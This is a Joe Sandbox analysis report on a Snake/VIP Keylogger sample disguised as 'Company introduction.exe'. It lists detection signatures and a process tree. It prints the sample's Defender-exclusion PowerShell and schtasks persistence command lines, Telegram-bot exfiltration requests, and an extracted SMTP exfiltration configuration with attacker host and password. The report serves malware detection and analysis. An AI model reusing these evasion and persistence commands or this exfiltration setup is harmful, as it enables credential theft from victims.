Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Company introduction.exe

Overview

General Information

Sample name:Company introduction.exe
Analysis ID:1591636
MD5:10f72e53a2c9f106093c233b56a3a819
SHA1:e8a63836ff90493559b69a1bc6d6080ba9370a99
SHA256:84e892d4627a3a3aa053b30200788bd6942c046d2dadcf5121017a32e10142f2
Tags:exeMassLoggerRFQuser-cocaman
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Company introduction.exe (PID: 7452 cmdline: "C:\Users\user\Desktop\Company introduction.exe" MD5: 10F72E53A2C9F106093C233B56A3A819)
    • powershell.exe (PID: 7652 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FzXKnGk.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7948 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7700 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FzXKnGk" /XML "C:\Users\user\AppData\Local\Temp\tmpE629.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Company introduction.exe (PID: 7812 cmdline: "C:\Users\user\Desktop\Company introduction.exe" MD5: 10F72E53A2C9F106093C233B56A3A819)
  • FzXKnGk.exe (PID: 7888 cmdline: C:\Users\user\AppData\Roaming\FzXKnGk.exe MD5: 10F72E53A2C9F106093C233B56A3A819)
    • schtasks.exe (PID: 8024 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FzXKnGk" /XML "C:\Users\user\AppData\Local\Temp\tmpEF32.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 8032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • FzXKnGk.exe (PID: 8068 cmdline: "C:\Users\user\AppData\Roaming\FzXKnGk.exe" MD5: 10F72E53A2C9F106093C233B56A3A819)
    • FzXKnGk.exe (PID: 8144 cmdline: "C:\Users\user\AppData\Roaming\FzXKnGk.exe" MD5: 10F72E53A2C9F106093C233B56A3A819)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "logs@htcp.homes", "Password": "7213575aceACE@@", "Host": "mail.htcp.homes", "Port": "587"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "logs@htcp.homes", "Password": "7213575aceACE@@", "Host": "mail.htcp.homes", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.1759032801.0000000004264000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000007.00000002.1759032801.0000000004264000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
      00000007.00000002.1759032801.0000000004264000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000007.00000002.1759032801.0000000004264000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0x2e710:$a1: get_encryptedPassword
        • 0x2ec98:$a2: get_encryptedUsername
        • 0x2e383:$a3: get_timePasswordChanged
        • 0x2e49a:$a4: get_passwordField
        • 0x2e726:$a5: set_encryptedPassword
        • 0x31442:$a6: get_passwords
        • 0x317d6:$a7: get_logins
        • 0x3142e:$a8: GetOutlookPasswords
        • 0x30de7:$a9: StartKeylogger
        • 0x3172f:$a10: KeyLoggerEventArgs
        • 0x30e87:$a11: KeyLoggerEventArgsEventHandler
        0000000C.00000002.2937919242.000000000042F000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Click to see the 31 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          7.2.FzXKnGk.exe.4405f58.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            7.2.FzXKnGk.exe.4405f58.0.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
              7.2.FzXKnGk.exe.4405f58.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                7.2.FzXKnGk.exe.4405f58.0.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                • 0x2bea0:$a1: get_encryptedPassword
                • 0x2c428:$a2: get_encryptedUsername
                • 0x2bb13:$a3: get_timePasswordChanged
                • 0x2bc2a:$a4: get_passwordField
                • 0x2beb6:$a5: set_encryptedPassword
                • 0x2ebd2:$a6: get_passwords
                • 0x2ef66:$a7: get_logins
                • 0x2ebbe:$a8: GetOutlookPasswords
                • 0x2e577:$a9: StartKeylogger
                • 0x2eebf:$a10: KeyLoggerEventArgs
                • 0x2e617:$a11: KeyLoggerEventArgsEventHandler
                7.2.FzXKnGk.exe.4405f58.0.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
                • 0x3946e:$a2: \Comodo\Dragon\User Data\Default\Login Data
                • 0x38b11:$a3: \Google\Chrome\User Data\Default\Login Data
                • 0x38d6e:$a4: \Orbitum\User Data\Default\Login Data
                • 0x3974d:$a5: \Kometa\User Data\Default\Login Data
                Click to see the 47 entries

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FzXKnGk.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FzXKnGk.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Company introduction.exe", ParentImage: C:\Users\user\Desktop\Company introduction.exe, ParentProcessId: 7452, ParentProcessName: Company introduction.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FzXKnGk.exe", ProcessId: 7652, ProcessName: powershell.exe
                Sigma detected: Powershell Defender Exclusion
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FzXKnGk.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FzXKnGk.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Company introduction.exe", ParentImage: C:\Users\user\Desktop\Company introduction.exe, ParentProcessId: 7452, ParentProcessName: Company introduction.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FzXKnGk.exe", ProcessId: 7652, ProcessName: powershell.exe
                Sigma detected: Suspicious Add Scheduled Task Parent
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FzXKnGk" /XML "C:\Users\user\AppData\Local\Temp\tmpEF32.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FzXKnGk" /XML "C:\Users\user\AppData\Local\Temp\tmpEF32.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\FzXKnGk.exe, ParentImage: C:\Users\user\AppData\Roaming\FzXKnGk.exe, ParentProcessId: 7888, ParentProcessName: FzXKnGk.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FzXKnGk" /XML "C:\Users\user\AppData\Local\Temp\tmpEF32.tmp", ProcessId: 8024, ProcessName: schtasks.exe
                Sigma detected: Suspicious Schtasks From Env Var Folder
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FzXKnGk" /XML "C:\Users\user\AppData\Local\Temp\tmpE629.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FzXKnGk" /XML "C:\Users\user\AppData\Local\Temp\tmpE629.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Company introduction.exe", ParentImage: C:\Users\user\Desktop\Company introduction.exe, ParentProcessId: 7452, ParentProcessName: Company introduction.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FzXKnGk" /XML "C:\Users\user\AppData\Local\Temp\tmpE629.tmp", ProcessId: 7700, ProcessName: schtasks.exe
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FzXKnGk.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FzXKnGk.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Company introduction.exe", ParentImage: C:\Users\user\Desktop\Company introduction.exe, ParentProcessId: 7452, ParentProcessName: Company introduction.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FzXKnGk.exe", ProcessId: 7652, ProcessName: powershell.exe

                Persistence and Installation Behavior

                barindex
                Sigma detected: Scheduled temp file as task from temp location
                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FzXKnGk" /XML "C:\Users\user\AppData\Local\Temp\tmpE629.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FzXKnGk" /XML "C:\Users\user\AppData\Local\Temp\tmpE629.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Company introduction.exe", ParentImage: C:\Users\user\Desktop\Company introduction.exe, ParentProcessId: 7452, ParentProcessName: Company introduction.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FzXKnGk" /XML "C:\Users\user\AppData\Local\Temp\tmpE629.tmp", ProcessId: 7700, ProcessName: schtasks.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-15T08:39:05.771201+010028033053Unknown Traffic192.168.2.449735104.21.48.1443TCP
                2025-01-15T08:39:08.006925+010028033053Unknown Traffic192.168.2.449743104.21.48.1443TCP
                2025-01-15T08:39:09.261798+010028033053Unknown Traffic192.168.2.449747104.21.48.1443TCP
                2025-01-15T08:39:10.767027+010028033053Unknown Traffic192.168.2.449752104.21.48.1443TCP
                2025-01-15T08:39:12.063724+010028033053Unknown Traffic192.168.2.449756104.21.48.1443TCP
                2025-01-15T08:39:14.296041+010028033053Unknown Traffic192.168.2.449763104.21.48.1443TCP
                2025-01-15T08:39:14.542062+010028033053Unknown Traffic192.168.2.449764104.21.48.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-15T08:39:04.279464+010028032742Potentially Bad Traffic192.168.2.449733193.122.6.16880TCP
                2025-01-15T08:39:05.257413+010028032742Potentially Bad Traffic192.168.2.449733193.122.6.16880TCP
                2025-01-15T08:39:06.498360+010028032742Potentially Bad Traffic192.168.2.449738193.122.6.16880TCP
                2025-01-15T08:39:06.607571+010028032742Potentially Bad Traffic192.168.2.449737193.122.6.16880TCP
                2025-01-15T08:39:07.451354+010028032742Potentially Bad Traffic192.168.2.449737193.122.6.16880TCP
                2025-01-15T08:39:08.704094+010028032742Potentially Bad Traffic192.168.2.449745193.122.6.16880TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-15T08:39:15.625059+010018100071Potentially Bad Traffic192.168.2.449766149.154.167.220443TCP
                2025-01-15T08:39:17.808179+010018100071Potentially Bad Traffic192.168.2.449773149.154.167.220443TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: Company introduction.exeAvira: detected
                Antivirus detection for dropped file
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeAvira: detection malicious, Label: HEUR/AGEN.1311126
                Found malware configuration
                Source: 00000007.00000002.1759032801.0000000004405000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "logs@htcp.homes", "Password": "7213575aceACE@@", "Host": "mail.htcp.homes", "Port": "587", "Version": "4.4"}
                Source: 0.2.Company introduction.exe.4e575e0.3.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "logs@htcp.homes", "Password": "7213575aceACE@@", "Host": "mail.htcp.homes", "Port": "587"}
                Multi AV Scanner detection for dropped file
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeReversingLabs: Detection: 34%
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeVirustotal: Detection: 29%Perma Link
                Multi AV Scanner detection for submitted file
                Source: Company introduction.exeVirustotal: Detection: 29%Perma Link
                Source: Company introduction.exeReversingLabs: Detection: 34%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for dropped file
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeJoe Sandbox ML: detected
                Machine Learning detection for sample
                Source: Company introduction.exeJoe Sandbox ML: detected

                Location Tracking

                barindex
                Tries to detect the country of the analysis system (by using the IP)
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: Company introduction.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49734 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49741 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49766 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49773 version: TLS 1.2
                Source: Company introduction.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 4x nop then jmp 07E93F06h0_2_07E93F5E
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 4x nop then jmp 017DF8E9h6_2_017DF631
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 4x nop then jmp 017DFD41h6_2_017DFA88
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 4x nop then jmp 05A8DC51h6_2_05A8D9A8
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 4x nop then jmp 05A831E0h6_2_05A82DBF
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 4x nop then jmp 05A831E0h6_2_05A82DC8
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 4x nop then jmp 05A831E0h6_2_05A8310E
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 4x nop then jmp 05A82C19h6_2_05A82968
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 4x nop then jmp 05A8D7F9h6_2_05A8D550
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 4x nop then jmp 05A8CF49h6_2_05A8CCA0
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 4x nop then jmp 05A8D3A1h6_2_05A8D0F8
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 4x nop then jmp 05A8FAB9h6_2_05A8F810
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h6_2_05A80040
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h6_2_05A80853
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 4x nop then jmp 05A8F661h6_2_05A8F3B8
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 4x nop then jmp 05A80D0Dh6_2_05A80B30
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 4x nop then jmp 05A81697h6_2_05A80B30
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 4x nop then jmp 05A8EDB1h6_2_05A8EB08
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 4x nop then jmp 05A8F209h6_2_05A8EF60
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 4x nop then jmp 05A8E959h6_2_05A8E6B0
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 4x nop then jmp 05A8E0A9h6_2_05A8DE00
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h6_2_05A80673
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 4x nop then jmp 05A8E501h6_2_05A8E258
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 4x nop then jmp 0183F8E9h12_2_0183F631
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 4x nop then jmp 0183FD41h12_2_0183FA88
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 4x nop then jmp 06F60D0Dh12_2_06F60B30
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 4x nop then jmp 06F61697h12_2_06F60B30
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 4x nop then jmp 06F631E0h12_2_06F62DC8
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 4x nop then jmp 06F62C19h12_2_06F62968
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 4x nop then jmp 06F6E959h12_2_06F6E6B0
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h12_2_06F60673
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 4x nop then jmp 06F6E501h12_2_06F6E258
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 4x nop then jmp 06F6E0A9h12_2_06F6DE00
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 4x nop then jmp 06F6F661h12_2_06F6F3B8
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 4x nop then jmp 06F6F209h12_2_06F6EF60
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 4x nop then jmp 06F6EDB1h12_2_06F6EB08
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 4x nop then jmp 06F6D3A1h12_2_06F6D0F8
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 4x nop then jmp 06F6CF49h12_2_06F6CCA0
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h12_2_06F60853
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h12_2_06F60040
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 4x nop then jmp 06F6FAB9h12_2_06F6F810
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 4x nop then jmp 06F6DC51h12_2_06F6D9A8
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 4x nop then jmp 06F6D7F9h12_2_06F6D550
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 4x nop then jmp 06F631E0h12_2_06F6310E

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49766 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49773 -> 149.154.167.220:443
                Uses the Telegram API (likely for C&C communication)
                Source: unknownDNS query: name: api.telegram.org
                Yara detected Generic Downloader
                Source: Yara matchFile source: 7.2.FzXKnGk.exe.4448f78.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.FzXKnGk.exe.4405f58.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Company introduction.exe.4e9a600.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Company introduction.exe.4e575e0.3.raw.unpack, type: UNPACKEDPE
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:302494%0D%0ADate%20and%20Time:%2015/01/2025%20/%2014:34:14%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20302494%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:302494%0D%0ADate%20and%20Time:%2015/01/2025%20/%2014:14:32%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20302494%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 104.21.48.1 104.21.48.1
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
                Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownDNS query: name: checkip.dyndns.org
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49745 -> 193.122.6.168:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49738 -> 193.122.6.168:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49733 -> 193.122.6.168:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49737 -> 193.122.6.168:80
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49743 -> 104.21.48.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49764 -> 104.21.48.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49747 -> 104.21.48.1:443
